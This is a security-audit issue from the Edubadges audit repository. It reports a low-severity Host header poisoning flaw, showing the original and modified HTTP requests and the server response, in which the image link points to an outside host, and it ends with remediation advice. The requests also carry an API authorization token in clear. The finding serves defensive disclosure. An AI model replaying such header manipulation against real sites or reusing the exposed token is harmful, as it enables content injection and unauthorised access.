search

edubadges / audit

Code audit repo for Edubadges
0 stars 0 forks source link

Host header poisoning #9

Open sveeke opened 6 years ago

sveeke commented 6 years ago

The application appears to trust the user-supplied host header.

sveeke commented 6 years ago

threatLevel="Low" type="Host-Header-Poisoning"

The application appears to trust the user-supplied host header which allows the attacker to load a PNG-file from another server because the HTTP Host header value is used to generate an image link. This is a very bad idea, because the HTTP Host header can be controlled by an attacker. ROS also verified that the links in the password reset e-mail are not using the Host Header. This prevents an attacker from stealing password reset tokens.

Original request:

POST /v1/issuer/issuers HTTP/1.1
Host: badgr-dev2.edubadges.nl
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/create
Content-Length: 57523
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"name":"nn","description":"nnn","email":"stefanpentest+blaat6767@gmail.com","url":"https://www.edubadges.nl","image":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAI4AAAB6CAYAAABp/msHAAAgAElEQVR4nKSdd3hUVf7/bzIpQOhdiogFKyrWXVRUehHpHdJ7pveWmUzN1PTQBRTEsrI2RMWCFV17WQVXXXXdr7quBWkhCcnr98dwDzOI+v0+v/s8n+fO3Nx75p5z3ud9Pu2cSHPnzsVoNKLX6/H5fLjdbqqqqtDpdBQVFVFSUoLdbqe0tJTS0lJKSkooKSlh2bJl1NTUYDQaMRqNlJeX4/P50Gg0mM1mLBYLVqsVv99PaWkpeXl5qFQqqqqqKC4uprKyEpVKRUVFBSaTifz8fLRa

<KNIP>

Example request (changed host to radicallyopensecurity.com):

POST /v1/issuer/issuers HTTP/1.1
Host: radicallyopensecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Token 5a29a471f3b21be11928361f5c42aeabf0c5cd8f
Content-Type: application/json
Referer: https://surf-dev2.edubadges.nl/issuer/create
Content-Length: 57523
Origin: https://surf-dev2.edubadges.nl
Connection: close

{"name":"nn","description":"nnn","email":"stefanpentest+blaat6767@gmail.com","url":"https://www.edubadges.nl","image":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAI4AAAB6CAYAAABp/msHAAAgAElEQVR4nKSdd3hUVf7/bzIpQOhdiogFKyrWXVRUehHpHdJ7pveWmUzN1PTQBRTEsrI2RMWCFV17WQVXXXXdr7quBWkhCcnr98dwDzOI+v0+v/s8n+fO3Nx75p5z3ud9Pu2cSHPnzsVoNKLX6/H5fLjdbqqqqtDpdBQVFVFSUoLdbqe0tJTS0lJKSkooKSlh2bJl1NTUYDQaMRqNlJeX4/P50Gg0mM1mLBYLVqsVv99PaWkpeXl5qFQqqqqqKC4uprKyEpVKRUVFBSaTifz8fLRa

<KNIP>

Note that in the response the image address is changed to: radicallyopensecurity.com

HTTP/1.1 201 Created
Server: nginx/1.12.2
Date: Sun, 10 Jun 2018 01:19:39 GMT
Content-Type: application/json
Connection: close
Vary: Accept, Authorization, Cookie
X-Frame-Options: ALLOW-FROM HTTP://CANVAS.EDUBADGES.NL/, HTTPS://CANVAS.EDUBADGES.NL
Access-Control-Allow-Origin: *
Allow: GET, POST, HEAD, OPTIONS
Content-Length: 925

{"created_at":"2018-06-10T01:19:39.622106Z","created_by":"stefanpentest+blaat6767@gmail.com","name":"nn","slug":"rwygWIDnR1uBB_i1MPwu_g","image":"http://radicallyopensecurity.com/media/uploads/issuers/issuer_logo_47a13e17-51fb-41cb-b6cc-1d12f7b58114.png","email":"stefanpentest+blaat6767@gmail.com","description":"nnn","url":"https://www.edubadges.nl","staff":[{"user":{"first_name":"gg","last_name":"Pentest","email":"stefanpentest+blaat6767@gmail.com","slug":"EQmfGQciRuKCC_LzIamehw"},"role":"owner"}],"json":{"@context":"https://w3id.org/openbadges/v1","description":"nnn","url":"https://www.edubadges.nl","email":"stefanpentest+blaat6767@gmail.com","type":"Issuer","id":"https://badgr-dev2.edubadges.nl/public/issuers/rwygWIDnR1uBB_i1MPwu_g","name":"nn","image":"https://badgr-dev2.edubadges.nl/public/issuers/rwygWIDnR1uBB_i1MPwu_g/image"},"badgeClassCount":0,"recipientGroupCount":0,"recipientCount":0,"pathwayCount":0}

In the Burp proxy a request is send to the PNG file on the radicallyopensecurity.com server.:

GET /media/uploads/issuers/issuer_logo_47a13e17-51fb-41cb-b6cc-1d12f7b58114.png HTTP/1.1
Host: radicallyopensecurity.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

image

Impact: This will bypass any server security if an attacker is able to control the contents of the file. The attacker could create a malicious PNG file on it's server.

Recommendation: The web application should use the SERVER_NAME instead of the Host header. It should also create a dummy vhost that catches all requests with unrecognized Host headers. This can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard serverName and turning the UseCanonicalName directive on.